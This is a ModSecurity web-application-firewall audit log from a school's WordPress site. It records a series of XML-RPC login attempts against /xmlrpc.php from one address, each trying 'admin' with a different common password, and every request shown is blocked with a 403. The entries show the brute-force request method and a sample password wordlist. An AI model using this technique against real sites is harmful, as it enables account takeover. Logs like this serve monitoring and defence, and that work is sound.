charset=iso-8859-1 --14be5f60-E-- --14be5f60-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068199077567 5339 (- - -) Stopwatch2: 1745068199077567 5339; combined=3583, p1=427, p2=2986, p3=0, p4=0, p5=102, sr=83, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14be5f60-Z-- --56448c52-A-- [19/Apr/2025:20:11:04 +0700] aAOg6A6cTFSgLAHl7PrO3QAAAAA 103.236.140.4 48952 103.236.140.4 8181 --56448c52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --56448c52-C-- wp.getUsersBlogs admin q1w2e3r4t5 --56448c52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56448c52-E-- --56448c52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068264144796 15715 (- - -) Stopwatch2: 1745068264144796 15715; combined=24414, p1=428, p2=3052, p3=0, p4=0, p5=10481, sr=78, sw=70, l=0, gc=10383 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56448c52-Z-- --8363db65-A-- [19/Apr/2025:20:12:08 +0700] aAOhKEruoUXZj665VUHuaQAAAM4 103.236.140.4 54928 103.236.140.4 8181 --8363db65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8363db65-C-- wp.getUsersBlogs admin Administrator1234 --8363db65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8363db65-E-- --8363db65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068328370916 4816 (- - -) Stopwatch2: 1745068328370916 4816; combined=3224, p1=390, p2=2688, p3=0, p4=0, p5=87, sr=70, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8363db65-Z-- --95148b3f-A-- [19/Apr/2025:20:13:10 +0700] aAOhZkruoUXZj665VUHvsAAAAMc 103.236.140.4 60682 103.236.140.4 8181 --95148b3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --95148b3f-C-- wp.getUsersBlogs admin zxcvbn --95148b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95148b3f-E-- --95148b3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068390416671 4662 (- - -) Stopwatch2: 1745068390416671 4662; combined=3226, p1=413, p2=2662, p3=0, p4=0, p5=89, sr=68, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95148b3f-Z-- --c2207450-A-- [19/Apr/2025:20:14:13 +0700] aAOhpUruoUXZj665VUHwCwAAANI 103.236.140.4 33242 103.236.140.4 8181 --c2207450-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2207450-C-- wp.getUsersBlogs admin admin098123 --c2207450-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2207450-E-- --c2207450-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068453327839 5682 (- - -) Stopwatch2: 1745068453327839 5682; combined=4146, p1=503, p2=3447, p3=0, p4=0, p5=114, sr=93, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2207450-Z-- --11e0f355-A-- [19/Apr/2025:20:15:17 +0700] aAOh5UruoUXZj665VUHwJwAAANI 103.236.140.4 33544 103.236.140.4 8181 --11e0f355-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --11e0f355-C-- wp.getUsersBlogs admin mypassword --11e0f355-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11e0f355-E-- --11e0f355-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068517699291 5347 (- - -) Stopwatch2: 1745068517699291 5347; combined=4063, p1=469, p2=3396, p3=0, p4=0, p5=115, sr=90, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11e0f355-Z-- --0d10494d-A-- [19/Apr/2025:20:16:21 +0700] aAOiJXNa4dA2HllpK_N1vgAAAIk 103.236.140.4 33858 103.236.140.4 8181 --0d10494d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0d10494d-C-- wp.getUsersBlogs admin explorer --0d10494d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d10494d-E-- --0d10494d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068581896593 5229 (- - -) Stopwatch2: 1745068581896593 5229; combined=3905, p1=482, p2=3232, p3=0, p4=0, p5=113, sr=92, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d10494d-Z-- --c7406f21-A-- [19/Apr/2025:20:17:29 +0700] aAOiaevDiFC_ir7MDwbf9wAAAFA 103.236.140.4 34174 103.236.140.4 8181 --c7406f21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c7406f21-C-- wp.getUsersBlogs admin security --c7406f21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7406f21-E-- --c7406f21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068649940563 5687 (- - -) Stopwatch2: 1745068649940563 5687; combined=4016, p1=473, p2=3367, p3=0, p4=0, p5=104, sr=85, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7406f21-Z-- --6fd1ff74-A-- [19/Apr/2025:20:18:32 +0700] aAOiqOvDiFC_ir7MDwbgFAAAAEc 103.236.140.4 34468 103.236.140.4 8181 --6fd1ff74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fd1ff74-C-- wp.getUsersBlogs admin qweasdzx --6fd1ff74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fd1ff74-E-- --6fd1ff74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (17+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068712103737 5763 (- - -) Stopwatch2: 1745068712103737 5763; combined=4058, p1=524, p2=3344, p3=0, p4=0, p5=110, sr=90, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fd1ff74-Z-- --7f47a26c-A-- [19/Apr/2025:20:19:35 +0700] aAOi5-vDiFC_ir7MDwbgHgAAAE0 103.236.140.4 34782 103.236.140.4 8181 --7f47a26c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7f47a26c-C-- wp.getUsersBlogs admin 123456qwe --7f47a26c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f47a26c-E-- --7f47a26c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068775335896 6132 (- - -) Stopwatch2: 1745068775335896 6132; combined=4126, p1=501, p2=3447, p3=0, p4=0, p5=105, sr=108, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f47a26c-Z-- --7e54a968-A-- [19/Apr/2025:20:20:35 +0700] aAOjIw6cTFSgLAHl7PrScgAAABI 103.236.140.4 35056 103.236.140.4 8181 --7e54a968-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7e54a968-C-- wp.getUsersBlogs admin 12345zx --7e54a968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e54a968-E-- --7e54a968-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068835460153 5556 (- - -) Stopwatch2: 1745068835460153 5556; combined=4221, p1=522, p2=3449, p3=0, p4=0, p5=142, sr=120, sw=108, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e54a968-Z-- --9bd5597e-A-- [19/Apr/2025:20:21:17 +0700] aAOjTUruoUXZj665VUHwrwAAANc 103.236.140.4 35270 103.236.140.4 8181 --9bd5597e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9bd5597e-C-- wp.getUsersBlogs admin 1234%^&* --9bd5597e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bd5597e-E-- --9bd5597e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068877708500 4337 (- - -) Stopwatch2: 1745068877708500 4337; combined=3295, p1=356, p2=2761, p3=0, p4=0, p5=109, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bd5597e-Z-- --d4604d7a-A-- [19/Apr/2025:20:21:36 +0700] aAOjYEruoUXZj665VUHwxAAAAM0 103.236.140.4 35350 103.236.140.4 8181 --d4604d7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d4604d7a-C-- wp.getUsersBlogs admin a123456 --d4604d7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4604d7a-E-- --d4604d7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068896690996 5561 (- - -) Stopwatch2: 1745068896690996 5561; combined=3963, p1=515, p2=3247, p3=0, p4=0, p5=115, sr=119, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4604d7a-Z-- --f4684249-A-- [19/Apr/2025:20:22:41 +0700] aAOjoevDiFC_ir7MDwbgXAAAAEY 103.236.140.4 35642 103.236.140.4 8181 --f4684249-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f4684249-C-- wp.getUsersBlogs admin fuckyou --f4684249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4684249-E-- --f4684249-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745068961299454 5467 (- - -) Stopwatch2: 1745068961299454 5467; combined=3856, p1=476, p2=3206, p3=0, p4=0, p5=101, sr=88, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4684249-Z-- --6f7f9f23-A-- [19/Apr/2025:20:23:44 +0700] aAOj4OvDiFC_ir7MDwbgigAAAEQ 103.236.140.4 35940 103.236.140.4 8181 --6f7f9f23-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6f7f9f23-C-- wp.getUsersBlogs admin master --6f7f9f23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f7f9f23-E-- --6f7f9f23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069024161048 5752 (- - -) Stopwatch2: 1745069024161048 5752; combined=4017, p1=520, p2=3308, p3=0, p4=0, p5=110, sr=103, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f7f9f23-Z-- --140ad93c-A-- [19/Apr/2025:20:24:46 +0700] aAOkHg6cTFSgLAHl7PrSzAAAABA 103.236.140.4 36230 103.236.140.4 8181 --140ad93c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --140ad93c-C-- wp.getUsersBlogs admin william --140ad93c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --140ad93c-E-- --140ad93c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745069086953345 6031 (- - -) Stopwatch2: 1745069086953345 6031; combined=4201, p1=482, p2=3462, p3=0, p4=0, p5=148, sr=90, sw=109, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --140ad93c-Z-- --d1c5a025-A-- [19/Apr/2025:20:25:47 +0700] aAOkW3Na4dA2HllpK_N2kQAAAI4 103.236.140.4 36502 103.236.140.4 8181 --d1c5a025-B-- POST /xmlrpc.php HTTP/1.0 Host: 